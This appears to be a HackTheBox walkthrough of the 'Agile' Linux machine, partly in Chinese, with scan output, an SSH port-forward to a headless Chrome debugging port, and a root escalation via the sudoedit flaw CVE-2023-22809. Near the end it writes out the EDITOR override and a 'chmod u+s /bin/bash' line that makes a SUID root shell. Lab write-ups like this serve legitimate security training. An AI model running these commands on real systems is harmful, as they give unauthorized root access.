Hackthebox - Agile - Linux

2023-03-06 20:58

👀Enumeration

cat portscan.tcp                         
Discovered open port 22/tcp on 10.129.29.9                                     
Discovered open port 80/tcp on 10.129.29.9 

Port 80

Scan Directory

🥨Exploitation

🎶Foothold.

Moved edwards

corum@agile:~$ netstat -nat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:5555          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:5000          0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN     
tcp        0    444 10.129.30.83:22         10.10.16.31:44890       ESTABLISHED
tcp        0      0 127.0.0.1:41829         127.0.0.1:60810         TIME_WAIT  
tcp        0      0 127.0.0.1:41829         127.0.0.1:60808         TIME_WAIT  
tcp        0      0 127.0.0.1:33283         127.0.0.1:50604         TIME_WAIT  
tcp      150      0 127.0.0.1:56020         127.0.0.1:3306          CLOSE_WAIT 
tcp        0      0 127.0.0.1:33283         127.0.0.1:55180         TIME_WAIT  
tcp        0      1 10.129.30.83:36294      8.8.8.8:53              SYN_SENT   
tcp6       0      0 :::22                   :::*                    LISTEN     

corum@agile:~$ ps -ef | grep 41829
runner     17254   17248  5 12:22 ?        00:00:00 /usr/bin/google-chrome --allow-pre-commit-input --crash-dumps-dir=/tmp --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-gpu --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-blink-features=ShadowDOMV0 --enable-logging --headless --log-level=0 --no-first-run --no-service-autorun --password-store=basic --remote-debugging-port=41829 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.com.google.Chrome.hy4sbe --window-size=1420,1080 data:,
runner     17320   17269  8 12:22 ?        00:00:00 /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=17261 --lang=en-US --enable-automation --enable-logging --log-level=0 --remote-debugging-port=41829 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1678072321972724 --launch-time-ticks=33000521678 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=0,i,424189539364511568,869939118205617861,131072 --disable-features=PaintHolding
corum      17333   17141  0 12:22 pts/0    00:00:00 grep --color=auto 41829

使用 ssh 将端口转发至本地ssh corum@superpass.htb -L 41829:127.0.0.1:41829

来到此页面将 url 添加到目标
接着进入页面，就可以看到一个凭据

使用 ssh 登录

✨Privilege Escation

🎉ROOT

当移动至 用户后，查看 sudo -l

edwards@agile:~$ sudo -l
Matching Defaults entries for edwards on agile:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User edwards may run the following commands on agile:
    (dev_admin : dev_admin) sudoedit /app/config_test.json

搜索相关漏洞得到
https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc/blob/main/exploit.sh

edwards@agile:/tmp$ export EDITOR='vim -- /app/venv/bin/activate'
edwards@agile:/tmp$ sudo -u dev_admin sudoedit /app/config_test.json

添加一行 chmod u+s /bin/bash
等待几秒后将会为 /bin/bash 添加 s 权限位